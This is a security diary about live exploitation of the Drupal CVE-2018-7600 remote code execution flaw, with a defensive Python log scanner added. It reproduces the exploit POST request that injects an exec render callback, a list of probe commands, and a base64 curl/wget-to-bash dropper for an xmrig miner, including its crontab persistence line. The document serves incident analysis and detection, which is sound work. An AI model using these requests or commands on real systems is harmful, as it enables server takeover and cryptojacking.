Drupal CVE-2018-7600 PoC is Public

Published: 2018-04-13
Last Updated: 2018-04-13 15:06:15 UTC
by Kevin Liston (Version: 1)

[Update: Now used to install Monero Miners. See below for details]

Drupal announced a Remote Code Execution vulnerability affecting Drupal 7.x and 8.x on March 28 (https://www.drupal.org/sa-core-2018-002).

Proof of concept code appeared on GitHub on April 12th. Quick testing on the handler's honeypots indicates that it functions as advertised.

Upgrade to 7.58 or 8.5.1.

Scans/attempts are showing up in other handlers' honeypots:

115.236.45.238 - - [13/Apr/2018:03:20:55 +0200] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 38174 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) Gecko/20100101 Firefox/52.0"

And here is a second exploit attempt, trying to identify vulnerable servers:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: <hostname>
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 162
Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=ping <hostname>.mu6fea.ceye.io -c 1

The payload pings a host whose name is the target's own hostname prefixed to the domain being pinged. This is sort of interesting, as mu6fea.ceye.io is a wildcard DNS entry, and *.mu6fea.ceye.io appears to resolve to 118.192.48.48 right now. So the detection of who is "pinging" is most likely done via DNS.

The authoritative name server for "ceye.io" is ns[12].hackernews.cc, which appears to belong to a Chinese security news site. Maybe they are working on a story to publish how many vulnerable systems there are, but actual exploitation of a vulnerability, even if somewhat benign, may be a step too far for a news story.
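The two attempts above share one request signature: a POST to a Drupal AJAX form whose element_parents value addresses a render-array property (the %23value, i.e. "#value"), plus a body that smuggles a #post_render callback. The following is an added example, not code from the diary or from Drupal, showing how to pick that pattern out of an Apache combined access log and how to pull the injected callback and its argument out of a captured POST body. The log lines and the function names are constructed for this example; the first log line and the body are the ones quoted in the diary, with the diary's own <hostname> placeholder left in place.

```python
import re
from urllib.parse import parse_qs

# Constructed sample (Apache combined log format). The first line is the
# honeypot entry quoted in the diary; the next two are benign requests made up
# here for contrast and do not correspond to real traffic.
SAMPLE_LOG = (
    '115.236.45.238 - - [13/Apr/2018:03:20:55 +0200] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 38174 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) Gecko/20100101 Firefox/52.0"\n'
    '192.0.2.10 - - [13/Apr/2018:03:21:10 +0200] "GET /user/register HTTP/1.1" 200 9120 "-" "Mozilla/5.0"\n'
    '192.0.2.11 - - [13/Apr/2018:03:21:30 +0200] "POST /user/register HTTP/1.1" 302 0 "-" "Mozilla/5.0"\n'
)

# The form body of the second attempt shown in the diary; <hostname> is the
# diary's own placeholder for the target's name.
SAMPLE_BODY = (
    "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec"
    "&mail[#type]=markup&mail[#markup]=ping <hostname>.mu6fea.ceye.io -c 1"
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_drupalgeddon2_request(method, target):
    """True when a request line matches the SA-CORE-2018-002 pattern in the
    diary: a POST to a Drupal AJAX form whose element_parents value addresses
    a render-array property (a '#' key, URL-encoded as %23). Legitimate Drupal
    AJAX never puts '#' keys in element_parents, so this is a high-signal match."""
    if method != "POST":
        return False
    # Split on '?' ourselves so a raw '#' in the query is not treated as a fragment.
    _, _, query = target.partition("?")
    qs = parse_qs(query)  # parse_qs URL-decodes keys and values
    parents = qs.get("element_parents", [])
    if not any("#" in p for p in parents):
        return False
    return qs.get("ajax_form") == ["1"] or qs.get("_wrapper_format") == ["drupal_ajax"]


def scan_log(text):
    """Return (ip, timestamp, status) for each matching request in an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_drupalgeddon2_request(m["method"], m["target"]):
            hits.append((m["ip"], m["ts"], m["status"]))
    return hits


def extract_render_callback(body):
    """For a captured POST body, return (callback, markup_argument) when a
    #post_render callback is injected, as in the diary's ping example, and
    None otherwise. Meant for full-request captures (mod_security audit log,
    reverse proxy, honeypot), since the access log alone does not keep the body."""
    fields = parse_qs(body, keep_blank_values=True)
    callback = markup = None
    for key, values in fields.items():
        if "[#post_render]" in key:
            callback = values[0]
        elif key.endswith("[#markup]"):
            markup = values[0]
    if callback is None:
        return None
    return callback, markup


if __name__ == "__main__":
    for ip, ts, status in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} -> SA-CORE-2018-002 probe (HTTP {status})")
    print("injected callback:", extract_render_callback(SAMPLE_BODY))
```

Note that the access-log check keys on element_parents containing a "#" rather than on the exact string from the honeypot, so it also catches attempts that target a different form element; the status code is reported because a 200 on a POST like this, as in the honeypot line, is worth a closer look, while a patched site typically refuses the request.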

Other payloads spotted so far:

echo `whoami`
phpinfo()
echo 123
whoami
touch 1.html
echo "xiokv"

The exploit attempts are currently arriving at a pretty brisk pace.

Here is one installing the standard xmrig Monero miner. The exploit string (spaces added to allow for wrapping on small screens):

echo KC91c3IvYmluL2N1cmwgLWZzU0wgaHR0c DovL3RjOHpkdy5pZjFqMHl0Z2t5cGEudGsvaSB8 fCAvdXNyL2Jpbi93Z2V0IGh0dHA6Ly90Yzh6 ZHcuaWYxajB5dGdreXBhLnRrL2kgLXFPLSkgfCAvYmluL2Jhc2g= | base64 -d | bash

This decodes to (http replaced with hxxp):

(/usr/bin/curl -fsSL hxxp://tc8zdw.if1j0ytgkypa.tk/i || /usr/bin/wget hxxp://tc8zdw.if1j0ytgkypa.tk/i -qO-) | /bin/bash

"i" is an installer script. It collects information about the system and makes itself persistent via an entry in the crontab:

*/30 * * * *   root   pkill -f /tmp/ ; (curl -fsSL http://${host}/i -o ${FN} || wget http://${host}/i -q -O ${FN}) ; bash ${FN} 1 &

It also downloads additional files:

  • A script to kill competing miners: http://tc8zdw.if1j0ytgkypa.tk/k
  • The actual xmrig miner: http://tc8zdw.if1j0ytgkypa.tk/64 (the filename depends on the output of "getconf LONG_BIT")

The miner then connects to port 6666 on u5evn7.if1j0ytgkypa.tk, which currently resolves to 207.246.113.230 and 144.202.37.130.
